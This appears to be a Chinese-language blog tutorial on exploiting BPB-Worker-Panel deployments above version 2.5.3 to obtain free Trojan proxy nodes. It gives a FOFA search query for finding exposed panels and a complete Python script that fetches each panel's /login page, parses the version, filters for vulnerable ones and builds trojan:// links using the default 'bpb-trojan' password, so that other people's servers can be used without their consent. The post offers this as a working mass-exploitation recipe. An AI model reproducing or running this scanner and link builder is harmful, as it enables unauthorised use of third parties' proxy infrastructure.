利用高于2.5.3版本的BPB-Worker-Panel面板漏洞,获取大量免费的Trojan节点
1. 前言
这个免费的代理节点主要是来自BPB-Worker-Panel 面板的漏洞利用,其实这个漏洞早就被爆出,但是开发者一直不在意,放任不管不修复,那大家就一起来欢乐吧…….. 纯属娱乐,也建议用户在其没有修复漏洞前不要再安装BPB-Worker-Panel 面板!
参考批量获取免费的VPN节点,用不完真用不完….. BPB-Worker-Panel 面板BUG利用!!-零度博客
2. 教程
2.1. 所需条件
安装下 Python 依赖库
2.2. 获取 BPB-Worker-Panel 面板网址
浏览器中打开 https://i.nosec.org/login 登录账号
打开 https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D 下载为csv文件
2.3. 判断是否为指定BPB-Worker-Panel面板版本
将下载好的文件重命名为 input.txt(或在代码中直接修改为文件名),在同文件夹下新建py文件,粘贴以下代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
| from packaging import version
import requests
input_file = "input.txt"
output_file = "trojan_urls.txt"
domain = "www.visa.com.sg"
def append_login_to_urls(input_file, output_file):
"""将地址加上 /login 并保存到新文件"""
print(f"正在处理 {input_file},将地址加上 /login 并保存到 {output_file}...")
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
if line.lower().startswith("http"):
url = line.split(",")[0].strip() + "/login"
outfile.write(url + "\n")
print(f"已完成地址追加,结果保存到 {output_file}")
def extract_version(html):
"""从 HTML 内容中提取 BPB Panel 的版本号"""
if "BPB Panel" in html:
start_index = html.find("BPB Panel")
version_start = html.find("2", start_index)
version_end = version_start
while version_end < len(html) and (
html[version_end].isdigit() or html[version_end] == "."
):
version_end += 1
return html[version_start:version_end]
return None
def check_bpb_version(input_file, output_file):
"""访问地址并检查 BPB Panel 的版本号"""
print(f"正在验证 {input_file} 中的地址...")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
}
min_version = version.parse("2.5.3")
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
url = line.strip()
try:
response = requests.get(url, headers=headers, timeout=10)
if response.status_code == 200 and "BPB Panel" in response.text:
raw_version = extract_version(response.text)
if raw_version:
parsed_version = version.parse(raw_version)
if parsed_version > min_version:
print(f"[匹配] {url} (版本号: {parsed_version})")
outfile.write(url + "\n")
except Exception as e:
print(f"[错误] 无法访问 {url},错误:{e}")
print(f"验证完成,符合条件的地址保存到 {output_file}")
def composite_trojan(input_file, output_file):
"""合成 Trojan 地址"""
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
url = line.strip()
url = url[8:-6]
trojan_url = f"trojan://bpb-trojan@{domain}:443?security=tls&sni={url}&fp=chrome&allowlnsecure=1&type=ws&host={url}&path=%2Ftr%3Fed%3D2560#{url}"
outfile.write(trojan_url + "\n")
if __name__ == "__main__":
append_login_to_urls(input_file, "bpb_urls.txt")
check_bpb_version("bpb_urls.txt", "bpb_urls_ok.txt")
composite_trojan("bpb_urls_ok.txt", output_file)
|
2.4. 导入 Trojan 节点
同文件夹下的 trojan_urls.txt 即为处理好的 Trojan 节点